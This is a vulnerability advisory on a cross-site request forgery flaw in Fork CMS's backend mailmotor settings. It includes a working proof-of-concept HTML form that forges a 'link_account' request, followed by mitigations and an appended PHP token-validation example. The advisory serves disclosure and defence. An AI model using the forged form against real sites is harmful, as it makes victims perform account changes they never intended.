Fork CMS suffers from a cross site request forgery vulnerability.
b1f5869ab5f633d45b74847ab258441ea7cf30e564f771344d4b1c00f8ba8c27
====================================================================================
Fork-CMS CSRF:
Introduction
Author: Rafay Baloch
CSRF or XSRF (cross-site request forgery) occurs when an attacker forces
the victim's browser to send a forged request, making the victim perform
a particular action without intending to. Any form missing CSRF
tokens is vulnerable to it.
Impact:
An attacker can accomplish multiple things; for example, he could change
the victim's form details.
PROOF OF CONCEPT:
The above two forms are missing CSRF tokens:
The form is missing CSRF tokens, which means that an attacker can force
a user to link to a Campaign Monitor account.
http://demo.fork-cms.com/private/en/mailmotor/settings?token=true#tabSettingsAccount
POC:
<html>
<body>
<form action="http://demo.fork-cms.com/backend/ajax.php" method="POST">
<input type="hidden" name="fork[module]" value="mailmotor" />
<input type="hidden" name="fork[action]" value="link_account" />
<input type="hidden" name="fork[language]" value="en" />
<input type="hidden" name="url" value="www.google.com" />
<input type="hidden" name="username" value="rafaybaloch" />
<input type="hidden" name="password" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
http://demo.fork-cms.com/private/en/settings/email
http://demo.fork-cms.com/backend/ajax.php
Mitigations:
- Reauthenticate the user if he performs an important action upon his
account, e.g. delete a user, delete himself, etc.
- Add a CSRF token to each and every request and make sure that it is
validated on the server.
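
The second mitigation as an added example (not Fork CMS code and not part of the original advisory): a server-side check that rejects the link_account request from the PoC because it carries no token. The function names, the csrf_token field name and the in-memory $session array are assumptions for illustration.

```php
<?php
// Added example, not Fork CMS code. Function names and the 'csrf_token'
// field are hypothetical; $session stands in for the server-side session.

// Issue one unpredictable token per session; the backend embeds it as a
// hidden field in every form it renders.
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Run before dispatching any state-changing action such as link_account.
function isRequestAllowed(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false; // state changes are accepted over POST only
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // A missing token, an empty token or a non-string value (csrf_token[]=x)
    // is refused before any comparison takes place.
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

$session = [];
$token = issueCsrfToken($session);

// Constructed request: the fields the PoC form submits, with no token.
$forged = [
    'fork' => ['module' => 'mailmotor', 'action' => 'link_account', 'language' => 'en'],
    'url' => 'www.google.com',
    'username' => 'rafaybaloch',
    'password' => '',
];
// Constructed request: same action, sent from a form the backend rendered.
$legit = $forged + ['csrf_token' => $token];
// Constructed request: token field present but not the session's value.
$guessed = $forged + ['csrf_token' => str_repeat('0', 64)];

var_dump(isRequestAllowed($session, 'POST', $forged));
var_dump(isRequestAllowed($session, 'POST', $guessed));
var_dump(isRequestAllowed($session, 'POST', $legit));
```

A page on another origin cannot read the token out of the victim's session, so a cross-site form can only produce the first or second request shape.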